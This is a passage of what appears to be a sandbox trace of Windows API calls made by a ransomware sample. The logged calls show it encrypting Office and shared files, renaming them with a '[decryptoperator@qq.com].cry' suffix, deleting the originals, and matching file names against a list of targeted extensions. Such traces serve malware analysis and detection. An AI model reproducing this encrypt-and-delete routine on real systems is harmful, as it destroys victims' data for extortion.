Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0050.720] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0050.721] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\visiorww.cab.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x210 [0050.721] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0050.721] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.721] ReadFile (in: hFile=0x210, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0050.839] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0050.839] ReadFile (in: hFile=0x210, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.059] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0051.059] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0051.059] ReadFile (in: hFile=0x210, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0051.185] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.186] WriteFile (in: hFile=0x210, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0051.201] SetEndOfFile (hFile=0x210) returned 1 [0051.201] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3fd40b0 [0051.201] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.201] WriteFile (in: hFile=0x210, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.202] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0x3dfe0fd, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.202] WriteFile (in: hFile=0x210, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.204] SetFilePointerEx (in: hFile=0x210, liDistanceToMove=0xb9ba2f7, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0051.204] WriteFile (in: hFile=0x210, lpBuffer=0x3fd40b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fd40b0*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0051.205] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3fd40b0 | out: hHeap=0x600000) returned 1 [0051.205] CloseHandle (hObject=0x210) returned 1 [0051.206] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x2020) returned 1 [0051.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.206] lstrlenW (lpString=".doc") returned 4 [0051.206] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0051.206] lstrlenW (lpString=".docx") returned 5 [0051.206] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0051.206] lstrlenW (lpString=".pdf") returned 4 [0051.206] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0051.206] lstrlenW (lpString=".xls") returned 4 [0051.206] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0051.206] lstrlenW (lpString=".xlsx") returned 5 [0051.206] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0051.206] lstrlenW (lpString=".ppt") returned 4 [0051.206] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0051.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.206] lstrlenW (lpString=".zip") returned 4 [0051.206] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0051.206] lstrlenW (lpString=".rar") returned 4 [0051.206] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0051.206] lstrlenW (lpString=".bz2") returned 4 [0051.206] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0051.206] lstrlenW (lpString=".7z") returned 3 [0051.206] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0051.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.206] lstrlenW (lpString=".dbf") returned 4 [0051.206] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString=".1cd") returned 4 [0051.207] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString=".jpg") returned 4 [0051.207] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString=".doc") returned 4 [0051.207] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString=".docx") returned 5 [0051.207] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0051.207] lstrlenW (lpString=".pdf") returned 4 [0051.207] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString=".xls") returned 4 [0051.207] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString=".xlsx") returned 5 [0051.207] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0051.207] lstrlenW (lpString=".ppt") returned 4 [0051.207] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString=".zip") returned 4 [0051.207] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString=".rar") returned 4 [0051.207] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString=".bz2") returned 4 [0051.207] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0051.207] lstrlenW (lpString=".7z") returned 3 [0051.207] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString=".dbf") returned 4 [0051.207] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0051.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.207] lstrlenW (lpString=".1cd") returned 4 [0051.207] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0051.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\VisiorWW.cab") returned 75 [0051.208] lstrlenW (lpString=".jpg") returned 4 [0051.208] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0051.208] lstrcmpiW (lpString1=".CNT", lpString2=".cry") returned -1 [0051.208] lstrlenW (lpString="EQNEDT32.CNT") returned 12 [0051.208] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.640] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2557) returned 1 [0051.640] CloseHandle (hObject=0x204) returned 1 [0051.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 0x20 [0051.640] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.640] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.640] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.640] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.641] GetLastError () returned 0x0 [0051.641] ReadFile (in: hFile=0x204, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x9fd, lpOverlapped=0x0) returned 1 [0051.751] WriteFile (in: hFile=0x220, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xa00, lpOverlapped=0x0) returned 1 [0051.752] ReadFile (in: hFile=0x204, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.752] WriteFile (in: hFile=0x220, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.752] SetEndOfFile (hFile=0x220) returned 1 [0051.752] CloseHandle (hObject=0x220) returned 1 [0051.752] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.752] SetEndOfFile (hFile=0x204) returned 1 [0051.754] CloseHandle (hObject=0x204) returned 1 [0051.754] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.754] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\eqnedt32.cnt")) returned 1 [0051.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.754] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.754] lstrlenW (lpString=".doc") returned 4 [0051.754] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0051.754] lstrlenW (lpString=".docx") returned 5 [0051.754] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0051.754] lstrlenW (lpString=".pdf") returned 4 [0051.755] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".xls") returned 4 [0051.755] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".xlsx") returned 5 [0051.755] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0051.755] lstrlenW (lpString=".ppt") returned 4 [0051.755] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.755] lstrlenW (lpString=".zip") returned 4 [0051.755] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".rar") returned 4 [0051.755] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".bz2") returned 4 [0051.755] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0051.755] lstrlenW (lpString=".7z") returned 3 [0051.755] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.755] lstrlenW (lpString=".dbf") returned 4 [0051.755] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.755] lstrlenW (lpString=".1cd") returned 4 [0051.755] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.755] lstrlenW (lpString=".jpg") returned 4 [0051.755] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.755] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.755] lstrlenW (lpString=".doc") returned 4 [0051.755] lstrcmpiW (lpString1=".doc", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".docx") returned 5 [0051.755] lstrcmpiW (lpString1=".docx", lpString2="2.CNT") returned -1 [0051.755] lstrlenW (lpString=".pdf") returned 4 [0051.755] lstrcmpiW (lpString1=".pdf", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".xls") returned 4 [0051.755] lstrcmpiW (lpString1=".xls", lpString2=".CNT") returned 1 [0051.755] lstrlenW (lpString=".xlsx") returned 5 [0051.755] lstrcmpiW (lpString1=".xlsx", lpString2="2.CNT") returned -1 [0051.755] lstrlenW (lpString=".ppt") returned 4 [0051.756] lstrcmpiW (lpString1=".ppt", lpString2=".CNT") returned 1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.756] lstrlenW (lpString=".zip") returned 4 [0051.756] lstrcmpiW (lpString1=".zip", lpString2=".CNT") returned 1 [0051.756] lstrlenW (lpString=".rar") returned 4 [0051.756] lstrcmpiW (lpString1=".rar", lpString2=".CNT") returned 1 [0051.756] lstrlenW (lpString=".bz2") returned 4 [0051.756] lstrcmpiW (lpString1=".bz2", lpString2=".CNT") returned -1 [0051.756] lstrlenW (lpString=".7z") returned 3 [0051.756] lstrcmpiW (lpString1=".7z", lpString2="CNT") returned -1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.756] lstrlenW (lpString=".dbf") returned 4 [0051.756] lstrcmpiW (lpString1=".dbf", lpString2=".CNT") returned 1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.756] lstrlenW (lpString=".1cd") returned 4 [0051.756] lstrcmpiW (lpString1=".1cd", lpString2=".CNT") returned -1 [0051.756] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\EQNEDT32.CNT") returned 68 [0051.756] lstrlenW (lpString=".jpg") returned 4 [0051.756] lstrcmpiW (lpString1=".jpg", lpString2=".CNT") returned 1 [0051.756] lstrcmpiW (lpString1=".CFG", lpString2=".cry") returned -1 [0051.756] lstrlenW (lpString="CGMIMP32.CFG") returned 12 [0051.756] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.757] GetFileSizeEx (in: hFile=0x204, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=6811) returned 1 [0051.757] CloseHandle (hObject=0x204) returned 1 [0051.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 0x20 [0051.757] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0051.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0051.757] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.757] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.757] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x220 [0051.757] GetLastError () returned 0x0 [0051.757] ReadFile (in: hFile=0x204, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x1a9b, lpOverlapped=0x0) returned 1 [0051.953] WriteFile (in: hFile=0x220, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0x1aa0, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0x1aa0, lpOverlapped=0x0) returned 1 [0051.954] ReadFile (in: hFile=0x204, lpBuffer=0x3630020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2b1fed4, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesRead=0x2b1fed4*=0x0, lpOverlapped=0x0) returned 1 [0051.954] WriteFile (in: hFile=0x220, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2b1fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fc9c*=0xec, lpOverlapped=0x0) returned 1 [0051.954] SetEndOfFile (hFile=0x220) returned 1 [0051.954] CloseHandle (hObject=0x220) returned 1 [0051.955] SetFilePointerEx (in: hFile=0x204, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0051.955] SetEndOfFile (hFile=0x204) returned 1 [0051.955] CloseHandle (hObject=0x204) returned 1 [0051.956] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0051.956] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\cgmimp32.cfg")) returned 1 [0051.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.956] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.956] lstrlenW (lpString=".doc") returned 4 [0051.956] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0051.956] lstrlenW (lpString=".docx") returned 5 [0051.957] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0051.957] lstrlenW (lpString=".pdf") returned 4 [0051.957] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString=".xls") returned 4 [0051.957] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString=".xlsx") returned 5 [0051.957] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0051.957] lstrlenW (lpString=".ppt") returned 4 [0051.957] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.957] lstrlenW (lpString=".zip") returned 4 [0051.957] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString=".rar") returned 4 [0051.957] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString=".bz2") returned 4 [0051.957] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0051.957] lstrlenW (lpString=".7z") returned 3 [0051.957] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0051.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.957] lstrlenW (lpString=".dbf") returned 4 [0051.957] lstrcmpiW (lpString1=".dbf", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.957] lstrlenW (lpString=".1cd") returned 4 [0051.957] lstrcmpiW (lpString1=".1cd", lpString2=".CFG") returned -1 [0051.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.957] lstrlenW (lpString=".jpg") returned 4 [0051.957] lstrcmpiW (lpString1=".jpg", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.957] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.957] lstrlenW (lpString=".doc") returned 4 [0051.957] lstrcmpiW (lpString1=".doc", lpString2=".CFG") returned 1 [0051.957] lstrlenW (lpString=".docx") returned 5 [0051.957] lstrcmpiW (lpString1=".docx", lpString2="2.CFG") returned -1 [0051.958] lstrlenW (lpString=".pdf") returned 4 [0051.958] lstrcmpiW (lpString1=".pdf", lpString2=".CFG") returned 1 [0051.958] lstrlenW (lpString=".xls") returned 4 [0051.958] lstrcmpiW (lpString1=".xls", lpString2=".CFG") returned 1 [0051.958] lstrlenW (lpString=".xlsx") returned 5 [0051.958] lstrcmpiW (lpString1=".xlsx", lpString2="2.CFG") returned -1 [0051.958] lstrlenW (lpString=".ppt") returned 4 [0051.958] lstrcmpiW (lpString1=".ppt", lpString2=".CFG") returned 1 [0051.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 [0051.958] lstrlenW (lpString=".zip") returned 4 [0051.958] lstrcmpiW (lpString1=".zip", lpString2=".CFG") returned 1 [0051.958] lstrlenW (lpString=".rar") returned 4 [0051.958] lstrcmpiW (lpString1=".rar", lpString2=".CFG") returned 1 [0051.958] lstrlenW (lpString=".bz2") returned 4 [0051.958] lstrcmpiW (lpString1=".bz2", lpString2=".CFG") returned -1 [0051.958] lstrlenW (lpString=".7z") returned 3 [0051.958] lstrcmpiW (lpString1=".7z", lpString2="CFG") returned -1 [0051.958] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\CGMIMP32.CFG") returned 67 